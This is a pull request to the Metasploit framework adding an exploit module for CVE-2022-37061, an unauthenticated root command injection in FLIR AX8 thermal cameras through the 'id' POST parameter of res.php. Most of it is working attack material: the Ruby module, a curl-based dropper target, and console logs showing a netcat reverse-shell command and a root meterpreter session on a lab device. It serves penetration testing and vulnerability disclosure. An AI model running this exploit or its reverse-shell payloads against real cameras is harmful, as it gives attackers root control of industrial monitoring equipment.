### PR TITLE
FLIR AX8 thermal camera unauthenticated RCE [CVE-2022-37061]

### DIFF
--- a/documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
+++ b/documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
@@ -1,0 +1,180 @@
+## Vulnerable Application
+
+FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras
+that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
+This device is typically used for monitoring industrial environments in a LAN based configuration.
+Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.
+
+FLIR AX8 is affected by an unauthenticated remote command injection vulnerability.
+This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter
+in `res.php` endpoint.
+A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
+This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.
+
+The endpoint /res.php can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID`
+to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command.
+
+Installing a vulnerable test bed requires a FLIR AX8 camera with the vulnerable firmware loaded.
+
+This module has been tested against a FLIR AX8 camera with the specifications listed below:
+
+* FLIR AX8 thermal camera
+* Firmware v1.40.16
+
+## Verification Steps
+
+1. `exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `netcat` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### FLIR AX8 netcat reverse shell
+
+```
+msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options
+
+Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting    Required  Description
+   ----   ---------------    --------  -----------
+   LHOST                     yes       The listen address (an interface may be specified)
+   LPORT                     yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 0
+target => 0
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited!
+[*] Performing command injection test issuing a sleep command of 10 seconds.
+[*] Elapsed time: 10.947262728999704 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with mkfifo /tmp/eyhxvh; nc 192.168.100.7 4444 0</tmp/eyhxvh | /bin/sh >/tmp/eyhxvh 2>&1; rm /tmp/eyhxvh
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37980) at 2022-10-21 07:00:16 +0000
+
+whoami
+root
+uname -a
+Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux
+exit
+```
+
+### FLIR AX8 meterpreter session
+
+```
+msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options
+
+Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting    Required  Description
+   ----   ---------------    --------  -----------
+   LHOST                     yes       The listen address (an interface may be specified)
+   LPORT                     yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 1
+target => 1
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited!
+[*] Performing command injection test issuing a sleep command of 7 seconds.
+[*] Elapsed time: 7.929586360999565 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://0.0.0.0:8080/GOCjBdalaU
+[*] Client 127.0.0.1 (curl/7.33.0) requested /GOCjBdalaU
+[*] Sending payload to 127.0.0.1 (curl/7.33.0)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:56540) at 2022-10-21 07:02:57 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux neco 3.0.35-flir)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+
+## Limitations
+Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
+Manually tested these payloads with `msfvenom`, but they produce segmentation vaults when executed on the target.
+However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.

--- a/documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
+++ b/documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
@@ -11,7 +11,7 @@ in `res.php` endpoint.
 A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
 This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.
 
-The endpoint /res.php can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID`
+The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID`
 to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command.
 
 Installing a vulnerable test bed requires a FLIR AX8 camera with the vulnerable firmware loaded.
@@ -23,7 +23,7 @@ This module has been tested against a FLIR AX8 camera with the specifications li
 
 ## Verification Steps
 
-1. `exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061`
+1. `use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061`
 1. `set RHOSTS <TARGET HOSTS>`
 1. `set RPORT <port>`
 1. `set LHOST <attacker host ip>`

--- a/documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
+++ b/documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
@@ -176,5 +176,5 @@ meterpreter >
 
 ## Limitations
 Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
-Manually tested these payloads with `msfvenom`, but they produce segmentation vaults when executed on the target.
+Manually tested these payloads with `msfvenom`, but they produce segmentation faults when executed on the target.
 However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.

--- a/modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb
+++ b/modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'FLIR AX8 unauthenticated RCE',
         'Description' => %q{
-          All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection.
+          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.
           This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
           in the res.php endpoint.
 
@@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
     })
   rescue StandardError => e
     elog("#{peer} - Communication error occurred: #{e.message}", error: e)
-    return Exploit::CheckCode::Unknown("Communication error occurred: #{e.message}")
+    print_error("Communication error occurred: #{e.message}")
+    return nil
   end
 
   # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution

--- a/modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb
+++ b/modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb
@@ -79,13 +79,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
+    action_id = rand(1..40)
     return send_request_cgi({
       'method' => 'POST',
       'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
       'uri' => normalize_uri(target_uri.path, 'res.php'),
       'vars_post' => {
         'action' => 'alarm',
-        'id' => "2;#{cmd}"
+        'id' => "#{action_id};#{cmd}"
       }
     })
   rescue StandardError => e

--- a/modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb
+++ b/modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb
@@ -1,0 +1,123 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FLIR AX8 unauthenticated RCE',
+        'Description' => %q{
+          All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection.
+          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
+          in the res.php endpoint.
+
+          This module uses the vulnerability to upload and execute payloads gaining root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
+          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
+          'h00die-gr3y' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2022-37061'],
+          ['PACKETSTORM', '168114'],
+          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
+        ],
+        'DisclosureDate' => '2022-08-19',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    return send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'uri' => normalize_uri(target_uri.path, 'res.php'),
+      'vars_post' => {
+        'action' => 'alarm',
+        'id' => "2;#{cmd}"
+      }
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    return Exploit::CheckCode::Unknown("Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
+  def check
+    print_status("Checking if #{peer} can be exploited!")
+    sleep_time = rand(5..10)
+    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
+    end
+
+    return Exploit::CheckCode::Unknown('No response received from the target!') unless res
+
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time
+
+    CheckCode::Vulnerable('Successfully tested command injection.')
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager
+    end
+  end
+end


### PR DESCRIPTION
FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras
that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
This device is typically used for monitoring industrial environments in a LAN based configuration.
Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability.
This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint.
A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
This issue affects all FLIR AX8 thermal sensor cameras versions up to and including `1.46.16`.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command.

Installing a vulnerable test bed requires a FLIR AX8 camera with the vulnerable firmware loaded.

This module has been tested against a FLIR AX8 camera with the specifications listed below:
* FLIR AX8 thermal camera
* Firmware v1.40.16

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `set RPORT <port>`
- [ ] `set LHOST <attacker host ip>`
- [ ] `set LPORT <attacker host port>`
- [ ] `set TARGET <0-Unix command or 1-Linux Dropper>`
- [ ] `exploit`

You should get a `netcat` shell or `meterpreter` session depending on the target and payload settings.

## Scenarios

### FLIR AX8 netcat reverse shell
```
msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options

Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
                                       resses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting    Required  Description
   ----   ---------------    --------  -----------
   LHOST                     yes       The listen address (an interface may be specified)
   LPORT                     yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
lhost => 192.168.100.7
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
lport => 4444
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 0
target => 0
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited!
[*] Performing command injection test issuing a sleep command of 10 seconds.
[*] Elapsed time: 10.947262728999704 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command with mkfifo /tmp/eyhxvh; nc 192.168.100.7 4444 0</tmp/eyhxvh | /bin/sh >/tmp/eyhxvh 2>&1; rm /tmp/eyhxvh
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37980) at 2022-10-21 07:00:16 +0000

whoami
root
uname -a
Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux
exit
```
### FLIR AX8 meterpreter session
```
msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options

Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
                                       resses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/armle/meterpreter_reverse_tcp):

   Name   Current Setting    Required  Description
   ----   ---------------    --------  -----------
   LHOST                     yes       The listen address (an interface may be specified)
   LPORT                     yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
lhost => 192.168.100.7
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
lport => 4444
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 1
target => 1
msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.180:80 can be exploited!
[*] Performing command injection test issuing a sleep command of 7 seconds.
[*] Elapsed time: 7.929586360999565 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper
[*] Using URL: http://0.0.0.0:8080/GOCjBdalaU
[*] Client 127.0.0.1 (curl/7.33.0) requested /GOCjBdalaU
[*] Sending payload to 127.0.0.1 (curl/7.33.0)
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:56540) at 2022-10-21 07:02:57 +0000
[*] Command Stager progress - 100.00% done (125/125 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.100.180
OS           :  (Linux neco 3.0.35-flir)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid
Server username: root
meterpreter >
```

## Limitations
Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
Manually tested these payloads with `msfvenom`, but they produce segmentation vaults when executed on the target.
However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.
